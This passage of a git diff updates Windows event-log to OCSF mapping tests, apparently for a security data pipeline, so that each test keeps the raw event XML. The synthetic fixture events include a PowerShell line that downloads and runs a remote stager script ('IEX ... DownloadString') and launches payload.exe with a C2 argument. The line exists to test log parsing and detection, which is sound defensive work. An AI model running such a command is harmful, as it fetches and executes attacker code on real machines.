0.0.0.0\n 67df1234\n c0000005\n 000000000000a3f0\n 0x1a4c\n 01da7c3f0b9a1234\n C:\\tmp\\payload.exe\n C:\\tmp\\payload.exe\n f87a1b2c-3d4e-5f6a-7b8c-9d0e1f2a3b4c\n \n\n", + raw_data_size: 1161, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-1001.tql b/microsoft/tests/ocsf/eid-1001.tql index 5ed23f8..362ea70 100644 --- a/microsoft/tests/ocsf/eid-1001.tql +++ b/microsoft/tests/ocsf/eid-1001.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1001.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1001.txt b/microsoft/tests/ocsf/eid-1001.txt index 5f1ea88..b826ac0 100644 --- a/microsoft/tests/ocsf/eid-1001.txt +++ b/microsoft/tests/ocsf/eid-1001.txt @@ -42,6 +42,8 @@ name: "payload.exe", path: "C:\\tmp\\payload.exe", }, + raw_data: "\n \n \n 1001\n 0\n 4\n 0\n 0x80000000000000\n \n 8002\n \n \n Application\n WINHOST01.corp.local\n \n \n 1234567890\n APPCRASH\n Not available\n 0\n payload.exe\n 0.0.0.0\n payload.exe\n 0.0.0.0\n c0000005\n 000000000000a3f0\n f87a1b2c-3d4e-5f6a-7b8c-9d0e1f2a3b4c\n C:\\tmp\\payload.exe\n C:\\tmp\\payload.exe\n \n\n", + raw_data_size: 1159, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-1002.tql b/microsoft/tests/ocsf/eid-1002.tql index 7e62840..77446f9 100644 --- a/microsoft/tests/ocsf/eid-1002.tql +++ b/microsoft/tests/ocsf/eid-1002.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1002.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1002.txt b/microsoft/tests/ocsf/eid-1002.txt index 616c0dd..0c8a4f7 100644 --- a/microsoft/tests/ocsf/eid-1002.txt +++ b/microsoft/tests/ocsf/eid-1002.txt @@ -43,6 +43,8 @@ path: "C:\\tmp\\payload.exe", pid: 6732, }, + raw_data: "\n \n \n 1002\n 0\n 2\n 101\n 0x80000000000000\n \n 8003\n \n \n Application\n WINHOST01.corp.local\n \n \n payload.exe\n 0.0.0.0\n 67df1234\n 0x1a4c\n 01da7c3f0b9a1234\n 60000\n 4\n f87a1b2c-3d4e-5f6a-7b8c-9d0e1f2a3b4c\n C:\\tmp\\payload.exe\n \n\n", + raw_data_size: 966, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-1006.tql b/microsoft/tests/ocsf/eid-1006.tql index fb37b06..25a1702 100644 --- a/microsoft/tests/ocsf/eid-1006.tql +++ b/microsoft/tests/ocsf/eid-1006.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1006.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1006.txt b/microsoft/tests/ocsf/eid-1006.txt index 81eb5db..7829bd6 100644 --- a/microsoft/tests/ocsf/eid-1006.txt +++ b/microsoft/tests/ocsf/eid-1006.txt @@ -70,6 +70,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 1006\n 0\n 3\n 0\n 0x8000000000000000\n \n 41006\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Trojan:Win32/Meterpreter.A!MSR\n 2147735503\n Severe\n Trojan\n C:\\tmp\\payload.exe\n Local machine\n Concrete\n Real-time Protection\n CORP\\jdoe\n C:\\tmp\\payload.exe\n 1.405.12.0\n 1.1.24010.10\n \n\n", + raw_data_size: 1271, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-1007.tql b/microsoft/tests/ocsf/eid-1007.tql index bbe415e..1a12c35 100644 --- a/microsoft/tests/ocsf/eid-1007.tql +++ b/microsoft/tests/ocsf/eid-1007.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1007.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1007.txt b/microsoft/tests/ocsf/eid-1007.txt index 0fbb9ef..4fb0a8e 100644 --- a/microsoft/tests/ocsf/eid-1007.txt +++ b/microsoft/tests/ocsf/eid-1007.txt @@ -52,6 +52,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 1007\n 0\n 4\n 0\n 0x8000000000000000\n \n 41007\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Trojan:Win32/Meterpreter.A!MSR\n 2147735503\n Severe\n Trojan\n Quarantine\n NT AUTHORITY\\SYSTEM\n 1.405.12.0\n 1.1.24010.10\n \n\n", + raw_data_size: 1054, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:58.123456700Z, diff --git a/microsoft/tests/ocsf/eid-1102.tql b/microsoft/tests/ocsf/eid-1102.tql index 92071e4..59d7d59 100644 --- a/microsoft/tests/ocsf/eid-1102.tql +++ b/microsoft/tests/ocsf/eid-1102.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1102.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1102.txt b/microsoft/tests/ocsf/eid-1102.txt index 0853412..8bf4313 100644 --- a/microsoft/tests/ocsf/eid-1102.txt +++ b/microsoft/tests/ocsf/eid-1102.txt @@ -44,6 +44,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 1102\n 0\n 4\n 104\n 0x4020000000000000\n \n 99001\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 0x1234\n 131972735680000000\n \n\n", + raw_data_size: 949, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-1116.tql b/microsoft/tests/ocsf/eid-1116.tql index dd1c6de..1e6b55a 100644 --- a/microsoft/tests/ocsf/eid-1116.tql +++ b/microsoft/tests/ocsf/eid-1116.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1116.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1116.txt b/microsoft/tests/ocsf/eid-1116.txt index a334e6b..d59c8af 100644 --- a/microsoft/tests/ocsf/eid-1116.txt +++ b/microsoft/tests/ocsf/eid-1116.txt @@ -72,6 +72,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 1116\n 0\n 3\n 0\n 0x8000000000000000\n \n 41116\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n {A1B2C3D4-E5F6-7A8B-9C0D-1E2F3A4B5C6D}\n 2024-03-23T12:34:56.789012300Z\n \n \n 2147735503\n Trojan:Win32/Meterpreter.A!MSR\n 5\n Severe\n 8\n Trojan\n https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Meterpreter.A!MSR&threatid=2147735503\n 1\n \n 1\n 4\n Real-time Protection\n C:\\tmp\\payload.exe\n CORP\\jdoe\n \n C:\\tmp\\payload.exe\n 1\n Local machine\n 1\n Suspended\n 0\n Concrete\n 0\n 9\n Not Applicable\n \n 1.405.12.0\n 1.1.24010.10\n \n\n", + raw_data_size: 2346, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-1117.tql b/microsoft/tests/ocsf/eid-1117.tql index 8fda408..e4c1c9b 100644 --- a/microsoft/tests/ocsf/eid-1117.tql +++ b/microsoft/tests/ocsf/eid-1117.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1117.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1117.txt b/microsoft/tests/ocsf/eid-1117.txt index 40294ac..0026ebf 100644 --- a/microsoft/tests/ocsf/eid-1117.txt +++ b/microsoft/tests/ocsf/eid-1117.txt @@ -72,6 +72,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 1117\n 0\n 4\n 0\n 0x8000000000000000\n \n 41117\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n {A1B2C3D4-E5F6-7A8B-9C0D-1E2F3A4B5C6D}\n 2024-03-23T12:34:56.789012300Z\n \n \n 2147735503\n Trojan:Win32/Meterpreter.A!MSR\n 5\n Severe\n 8\n Trojan\n https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Meterpreter.A!MSR&threatid=2147735503\n 1\n \n 2\n 4\n Real-time Protection\n C:\\tmp\\payload.exe\n CORP\\jdoe\n \n C:\\tmp\\payload.exe\n 1\n Local machine\n 1\n Suspended\n 0\n Concrete\n 0\n 2\n Quarantine\n NT AUTHORITY\\SYSTEM\n 1.405.12.0\n 1.1.24010.10\n \n\n", + raw_data_size: 2361, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:58.123456700Z, diff --git a/microsoft/tests/ocsf/eid-1121.tql b/microsoft/tests/ocsf/eid-1121.tql index ba6e840..aa061ba 100644 --- a/microsoft/tests/ocsf/eid-1121.tql +++ b/microsoft/tests/ocsf/eid-1121.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1121.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1121.txt b/microsoft/tests/ocsf/eid-1121.txt index 0046897..0f71cf6 100644 --- a/microsoft/tests/ocsf/eid-1121.txt +++ b/microsoft/tests/ocsf/eid-1121.txt @@ -80,6 +80,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 1121\n 0\n 3\n 0\n 0x8000000000000000\n \n 41121\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n C:\\tmp\\payload.exe\n C:\\tmp\\payload.exe\n SHA256=AABBCCDDEEFF00112233445566778899AABBCCDDEEFF00112233445566778899\n CORP\\jdoe\n 4.18.24010.12\n C:\\tmp\\payload.exe\n Exploit:Win32/CVE-2024-99999\n d4f940ab-401b-4efc-aadc-ad5f3c50688a\n Block process creations originating from PSExec and WMI commands\n \n\n", + raw_data_size: 1331, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-2000.tql b/microsoft/tests/ocsf/eid-2000.tql index a922689..800607e 100644 --- a/microsoft/tests/ocsf/eid-2000.tql +++ b/microsoft/tests/ocsf/eid-2000.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-2000.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-2000.txt b/microsoft/tests/ocsf/eid-2000.txt index c32a236..d0ebfad 100644 --- a/microsoft/tests/ocsf/eid-2000.txt +++ b/microsoft/tests/ocsf/eid-2000.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 2000\n 0\n 4\n 0\n 0x8000000000000000\n \n 42000\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n 1.405.12.0\n 1.405.11.0\n Microsoft Malware Protection Center\n Install\n https://go.microsoft.com/fwlink/?linkid=74005\n AntiVirus\n Full\n NT AUTHORITY\\SYSTEM\n 1.1.24010.10\n 1.1.24010.10\n \n\n", + raw_data_size: 1245, severity: "Informational", severity_id: 1, time: 2024-03-23T12:35:01Z, diff --git a/microsoft/tests/ocsf/eid-4100.tql b/microsoft/tests/ocsf/eid-4100.tql index 8bef252..6197f00 100644 --- a/microsoft/tests/ocsf/eid-4100.tql +++ b/microsoft/tests/ocsf/eid-4100.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4100.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4100.txt b/microsoft/tests/ocsf/eid-4100.txt index 3edd2ca..f268b27 100644 --- a/microsoft/tests/ocsf/eid-4100.txt +++ b/microsoft/tests/ocsf/eid-4100.txt @@ -44,6 +44,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4100\n 1\n 3\n 1\n 0x0\n \n 20100\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n -2146233087\n Access to the path 'C:\\Windows\\System32\\payload.exe' is denied.\n Error\n ConsoleHost\n 5.1.19041.4648\n {{a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}}\n C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n 5.1.19041.4648\n {{f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}}\n 2\n \n Copy-Item -Path C:\\tmp\\payload.exe -Destination C:\\Windows\\System32\\\n Copy-Item\n CORP\\jdoe\n \n Microsoft.PowerShell\n \n\n", + raw_data_size: 1600, script: { name: "Copy-Item", type: "PowerShell", diff --git a/microsoft/tests/ocsf/eid-4103.tql b/microsoft/tests/ocsf/eid-4103.tql index a310227..fb1a200 100644 --- a/microsoft/tests/ocsf/eid-4103.tql +++ b/microsoft/tests/ocsf/eid-4103.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4103.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4103.txt b/microsoft/tests/ocsf/eid-4103.txt index eb075a8..80ac0b4 100644 --- a/microsoft/tests/ocsf/eid-4103.txt +++ b/microsoft/tests/ocsf/eid-4103.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4103\n 1\n 4\n 1\n 0x0\n \n 20103\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.19041.4648\n Host ID = {{a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}}\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n Engine Version = 5.1.19041.4648\n Runspace ID = {{f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}}\n Pipeline ID = 3\n Command Name = Invoke-Expression\n Command Type = Cmdlet\n Script Name =\n Command Path =\n Sequence Number = 15\n User = CORP\\jdoe\n Connected User =\n Shell ID = Microsoft.PowerShell\n CommandInvocation(Invoke-Expression): \"Invoke-Expression\"\nParameterBinding(Invoke-Expression): name=\"Command\"; value=\"Start-Process -FilePath 'C:\tmp\\payload.exe' -ArgumentList '--c2 10.0.0.1' -WindowStyle Hidden\"\n \n\n", + raw_data_size: 1553, script: { type: "PowerShell", type_id: 2, diff --git a/microsoft/tests/ocsf/eid-4104.tql b/microsoft/tests/ocsf/eid-4104.tql index 90d213e..e18a1d2 100644 --- a/microsoft/tests/ocsf/eid-4104.tql +++ b/microsoft/tests/ocsf/eid-4104.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4104.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4104.txt b/microsoft/tests/ocsf/eid-4104.txt index 7ecd496..c6a085e 100644 --- a/microsoft/tests/ocsf/eid-4104.txt +++ b/microsoft/tests/ocsf/eid-4104.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4104\n 1\n 3\n 2\n 0x0\n \n 20104\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n 1\n 1\n IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/stager.ps1'); Start-Process -FilePath 'C:\\tmp\\payload.exe' -ArgumentList '--c2 10.0.0.1' -WindowStyle Hidden\n {f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}\n \n \n\n", + raw_data_size: 1061, script: { type: "PowerShell", type_id: 2, diff --git a/microsoft/tests/ocsf/eid-4105.tql b/microsoft/tests/ocsf/eid-4105.tql index f7042be..8d68e99 100644 --- a/microsoft/tests/ocsf/eid-4105.tql +++ b/microsoft/tests/ocsf/eid-4105.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4105.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4105.txt b/microsoft/tests/ocsf/eid-4105.txt index 48a12cb..59d0611 100644 --- a/microsoft/tests/ocsf/eid-4105.txt +++ b/microsoft/tests/ocsf/eid-4105.txt @@ -36,6 +36,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4105\n 1\n 5\n 2\n 0x0\n \n 20105\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n {f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}\n {a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}\n \n\n", + raw_data_size: 837, script: { type: "PowerShell", type_id: 2, diff --git a/microsoft/tests/ocsf/eid-4106.tql b/microsoft/tests/ocsf/eid-4106.tql index 11ac110..ccc75af 100644 --- a/microsoft/tests/ocsf/eid-4106.tql +++ b/microsoft/tests/ocsf/eid-4106.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4106.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4106.txt b/microsoft/tests/ocsf/eid-4106.txt index eaf1ed0..3f4972f 100644 --- a/microsoft/tests/ocsf/eid-4106.txt +++ b/microsoft/tests/ocsf/eid-4106.txt @@ -36,6 +36,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4106\n 1\n 5\n 2\n 0x0\n \n 20106\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n {f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}\n {a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}\n \n\n", + raw_data_size: 837, script: { type: "PowerShell", type_id: 2, diff --git a/microsoft/tests/ocsf/eid-4624.tql b/microsoft/tests/ocsf/eid-4624.tql index d89f11a..151d564 100644 --- a/microsoft/tests/ocsf/eid-4624.tql +++ b/microsoft/tests/ocsf/eid-4624.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4624.txt b/microsoft/tests/ocsf/eid-4624.txt index 622dd88..195b925 100644 --- a/microsoft/tests/ocsf/eid-4624.txt +++ b/microsoft/tests/ocsf/eid-4624.txt @@ -45,6 +45,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4624\n 2\n 0\n 12544\n 0x8020000000000000\n \n 98761\n \n \n Security\n DC01.corp.local\n \n \n S-1-0-0\n -\n -\n 0x0\n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 3\n Kerberos\n Kerberos\n -\n {B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}\n -\n -\n 0\n 0x0\n -\n 10.0.0.42\n 49827\n %%1833\n -\n -\n -\n %%1843\n 0x0\n %%1842\n \n\n", + raw_data_size: 1918, session: { uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", uid_alt: "0xA1B2C3", diff --git a/microsoft/tests/ocsf/eid-4625.tql b/microsoft/tests/ocsf/eid-4625.tql index 611473d..734cb5b 100644 --- a/microsoft/tests/ocsf/eid-4625.tql +++ b/microsoft/tests/ocsf/eid-4625.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4625.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4625.txt b/microsoft/tests/ocsf/eid-4625.txt index 1311115..2116e1c 100644 --- a/microsoft/tests/ocsf/eid-4625.txt +++ b/microsoft/tests/ocsf/eid-4625.txt @@ -45,6 +45,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4625\n 0\n 0\n 12546\n 0x8020000000000000\n \n 98762\n \n \n Security\n DC01.corp.local\n \n \n S-1-0-0\n -\n -\n 0x0\n S-1-0-0\n Administrator\n CORP\n 0xC000006D\n %%2313\n 0xC000006A\n 3\n NtLmSsp\n NTLM\n WINHOST01\n -\n -\n 0\n 0x0\n -\n 10.0.0.42\n 49827\n \n\n", + raw_data_size: 1569, severity: "Low", severity_id: 2, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-4648.tql b/microsoft/tests/ocsf/eid-4648.tql index af04fb8..2cb1610 100644 --- a/microsoft/tests/ocsf/eid-4648.tql +++ b/microsoft/tests/ocsf/eid-4648.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4648.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4648.txt b/microsoft/tests/ocsf/eid-4648.txt index b70f6cd..8988d8e 100644 --- a/microsoft/tests/ocsf/eid-4648.txt +++ b/microsoft/tests/ocsf/eid-4648.txt @@ -56,6 +56,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4648\n 0\n 0\n 12544\n 0x8020000000000000\n \n 98763\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n {00000000-0000-0000-0000-000000000000}\n svc_backup\n CORP\n {00000000-0000-0000-0000-000000000000}\n fileserver.corp.local\n fileserver.corp.local\n 0xA1B2C3\n C:\\tmp\\payload.exe\n 10.0.0.1\n 445\n \n\n", + raw_data_size: 1421, severity: "Informational", severity_id: 1, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-4672.tql b/microsoft/tests/ocsf/eid-4672.tql index 3c32717..eb64c2c 100644 --- a/microsoft/tests/ocsf/eid-4672.tql +++ b/microsoft/tests/ocsf/eid-4672.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4672.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4672.txt b/microsoft/tests/ocsf/eid-4672.txt index 601b432..6039c93 100644 --- a/microsoft/tests/ocsf/eid-4672.txt +++ b/microsoft/tests/ocsf/eid-4672.txt @@ -44,6 +44,8 @@ "SeSystemEnvironmentPrivilege", "SeImpersonatePrivilege", ], + raw_data: "\n \n \n 4672\n 0\n 0\n 12548\n 0x8020000000000000\n \n 98762\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-18\n SYSTEM\n NT AUTHORITY\n 0x3e7\n SeAssignPrimaryTokenPrivilege SeTcbPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeAuditPrivilege SeSystemEnvironmentPrivilege SeImpersonatePrivilege\n \n\n", + raw_data_size: 1086, session: { uid_alt: "0x3e7", }, diff --git a/microsoft/tests/ocsf/eid-4688.tql b/microsoft/tests/ocsf/eid-4688.tql index 0ed3bb8..bce49da 100644 --- a/microsoft/tests/ocsf/eid-4688.tql +++ b/microsoft/tests/ocsf/eid-4688.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4688.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4688.txt b/microsoft/tests/ocsf/eid-4688.txt index 5c1900e..b42a098 100644 --- a/microsoft/tests/ocsf/eid-4688.txt +++ b/microsoft/tests/ocsf/eid-4688.txt @@ -66,6 +66,8 @@ path: "C:\\tmp\\payload.exe", pid: 6732, }, + raw_data: "\n \n \n 4688\n 2\n 0\n 13312\n 0x8020000000000000\n \n 98764\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 0x1a4c\n C:\\tmp\\payload.exe\n %%1937\n 0x1234\n payload.exe --c2 10.0.0.1\n S-1-0-0\n -\n -\n 0x0\n C:\\Windows\\System32\\wscript.exe\n S-1-16-8192\n \n\n", + raw_data_size: 1429, severity: "Informational", severity_id: 1, status: "Success", diff --git a/microsoft/tests/ocsf/eid-4697.tql b/microsoft/tests/ocsf/eid-4697.tql index b702364..9542ccc 100644 --- a/microsoft/tests/ocsf/eid-4697.tql +++ b/microsoft/tests/ocsf/eid-4697.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4697.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4697.txt b/microsoft/tests/ocsf/eid-4697.txt index 6b9fa46..1fd6edf 100644 --- a/microsoft/tests/ocsf/eid-4697.txt +++ b/microsoft/tests/ocsf/eid-4697.txt @@ -41,6 +41,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4697\n 0\n 0\n 12289\n 0x8020000000000000\n \n 98765\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n PayloadSvc\n C:\\tmp\\payload.exe --svc\n 0x10\n 2\n LocalSystem\n \n\n", + raw_data_size: 1124, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4698.tql b/microsoft/tests/ocsf/eid-4698.tql index b29f9eb..e407887 100644 --- a/microsoft/tests/ocsf/eid-4698.tql +++ b/microsoft/tests/ocsf/eid-4698.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4698.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4698.txt 